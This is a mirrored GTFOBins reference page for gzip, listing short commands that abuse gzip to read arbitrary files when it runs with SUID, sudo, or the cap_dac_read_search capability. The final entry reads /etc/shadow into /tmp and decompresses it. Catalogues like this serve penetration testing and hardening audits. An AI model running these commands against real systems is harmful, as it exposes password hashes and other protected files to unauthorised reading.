public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-13 02:58:09 +01:00
Code Issues Projects Releases Wiki Activity
GTFOBins.github.io/_gtfobins/gzip.md
Sofia Engvall af39975201
Update gzip.md 
Adding capabilities for cap_dac_read_search
2024-11-06 01:37:13 +01:00

848 B
Raw Blame History

description functions
There are also a number of other utilities that rely on `gzip` under the hood, e.g., `zless`, `zcat`, `gunzip`, etc. Besides having similar features, they also allow privileged reads if `gzip` itself is SUID.
file-read suid sudo capabilities
code
LFILE=file_to_read gzip -f $LFILE -t
code
LFILE=file_to_read gzip -c $LFILE | gzip -d
code
LFILE=file_to_read ./gzip -f $LFILE -t
code
LFILE=file_to_read sudo gzip -f $LFILE -t
description code
If cap_dac_read_search is set. Run ``getcap -r / 2>/dev/null`` to confirm ``/usr/bin/gzip cap_dac_read_search=ep`` gzip can read any file: gzip -c /etc/shadow > /tmp/shadow.gz gzip -d /tmp/shadow.gz cat /tmp/shadow